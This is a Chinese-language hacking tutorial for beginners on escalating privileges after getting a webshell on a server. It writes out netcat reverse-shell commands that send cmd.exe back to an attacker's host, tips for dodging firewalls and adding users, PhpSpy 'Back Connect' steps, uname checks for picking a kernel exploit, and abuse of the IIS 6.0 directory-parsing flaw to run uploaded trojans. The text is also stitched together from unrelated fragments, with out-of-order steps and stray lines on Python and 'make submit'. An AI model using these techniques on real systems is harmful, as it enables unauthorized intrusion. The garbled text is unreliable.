有些新手朋友在拿到一個(gè)webshell后如果看到服務(wù)器是Linux或Unix操作系統(tǒng)的就直接放棄提權(quán),認(rèn)為Linux或Unix下的提權(quán)很難,不是大家能做的,其實(shí)Linux下的提權(quán)并沒有很多人想象的那么難,你真去嘗試做了,也許你就會(huì)發(fā)現(xiàn)Linux下的提權(quán)并不難,尤其是一些簡單的提權(quán)方法是很容易學(xué)會(huì)的。Linux下的提權(quán)我知道的比較簡單的方法都是在命令行下完成的,很多新手叉子可能根本沒接觸過Linux下的一些常用命令,今天危險(xiǎn)漫步就給大家介紹一些Linux下提權(quán)過程中常用到的Linux命令,由于我也是剛學(xué)了幾個(gè)Linux命令,介紹的不對或不全的還請大家多多指正和諒解。
對大家來說,在Linux下的提權(quán)最簡單也是最有效的方法就是通過本地溢出漏洞提權(quán)。找到合適的漏洞利用程序在命令行下運(yùn)行一下就完成了提權(quán)。
4. 如果執(zhí)行上述命令后出現(xiàn)無法安裝的提示,可使用下列命令進(jìn)行提權(quán):。本地cmd執(zhí)行:nc -vv -l -p 52 進(jìn)行反彈,接著在shell里執(zhí)行命令:c:\windows\temp\nc.exe -vv 服務(wù)器ip 999 -e c:\windows\temp\cmd.exe最好是80或8080這樣的端口,被防火墻攔截的幾率小很多,執(zhí)行成功后本地cmd命令:cd/(只是習(xí)慣而已),接著以telnet命令連接服務(wù)器:telnet 服務(wù)器ip 999,回車出現(xiàn)已選定服務(wù)器的ip就說明成功了,接著權(quán)限比較大了,嘗試建立用戶。3.python還提供了一個(gè)交互界面,輸入python進(jìn)入交互界面,輸入exit()退出交互界面,類似于linux終端,輸入一行命令,執(zhí)行一行,為學(xué)習(xí)python提供了很大的便利。
要想反彈回shell,你需要一臺有公網(wǎng)lP的電腦(當(dāng)然了,只有內(nèi)網(wǎng)IP的電腦做了端口映射也可以),然后在你要反彈回來的電腦上首先用nc來監(jiān)聽要反彈回來的端口,如果要反彈回來的端口為12345,就執(zhí)行nc -vv -|-p 12345來監(jiān)聽12345端口。
然后回到PhpSpy中的”Back Connec”,在“Your IP”后面自動(dòng)識別除了你當(dāng)前電腦的公網(wǎng)IP,如果要反彈到別的電腦上請輸入要反彈電腦的IP,我這里要反彈到本機(jī),就不需要修改了,“You Port”是你要反彈電腦上正在監(jiān)聽的端口,默認(rèn)為12345,知道我上面為什么在本機(jī)監(jiān)聽12345端口了吧,就是在這里不需要修改“Your Port”了,當(dāng)然,你也可以在本地監(jiān)聽123456端口,然后把“Your Port”也修改成對應(yīng)的123456端口就行了。點(diǎn)“Start”按鈕進(jìn)行反彈,過一會(huì)兒本機(jī)的監(jiān)聽窗口看到類似信息就說明反彈成功了,得到了一個(gè)可執(zhí)行交互命令的窗口。接下來執(zhí)行命令的效果和在Ubuntu的終端中執(zhí)行命令的效果幾乎完全相同,所以我在Ubuntu 10.10的終端中執(zhí)行常用的提權(quán)中用到的命令來給大家演示。
在反彈回來的權(quán)限較低的shell的命令窗口中有權(quán)限執(zhí)行的命令有:
1、uname 輸出一組系統(tǒng)信息。如果不跟隨選項(xiàng),則視為只附加-s選項(xiàng)。常跟的參數(shù)有-a,在我的Ubuntu 10.10的終端中執(zhí)行uname-a命令后顯示,其中最前面的Linux表示是基于Linux內(nèi)核的,2.6.35-28是具體的內(nèi)核版本號。這個(gè)內(nèi)核版本號非常重要,因?yàn)槿绻遣捎靡绯雎┒刺釞?quán)的話內(nèi)核版本號是尋找溢出漏洞利用程序最重要的參考信息,根據(jù)當(dāng)前的內(nèi)核版本號尋找適用于這個(gè)版本號的漏洞利用程序。
目錄漏洞防護(hù):在網(wǎng)站路徑下建立文件夾名字為.asp、.asa的文件夾,其目錄內(nèi)的任何擴(kuò)展名的文件都會(huì)被 iis 當(dāng)作asp文件來解析并執(zhí)行,利用這個(gè) iis 目錄解析漏洞,可實(shí)現(xiàn)上傳、執(zhí)行惡意文件的目的。例如iis的解析漏洞,我們創(chuàng)建一個(gè)目錄將目錄名稱修改為xxx.asp(在iis6.0的環(huán)境下),那么所有這個(gè)目錄下的文件不管擴(kuò)展名為什么,都會(huì)當(dāng)做asp文件解析執(zhí)行,上傳的時(shí)候我們就上傳普通txt或者圖片馬到這個(gè)目錄就可以執(zhí)行了。當(dāng)前shell下執(zhí)行make命令,生成可執(zhí)行程序文件,隨后make submit命令提交程序文件至本實(shí)例bin目錄下,通過cd命令定位至實(shí)例bin目錄,執(zhí)行該程序運(yùn)行結(jié)果如下所示。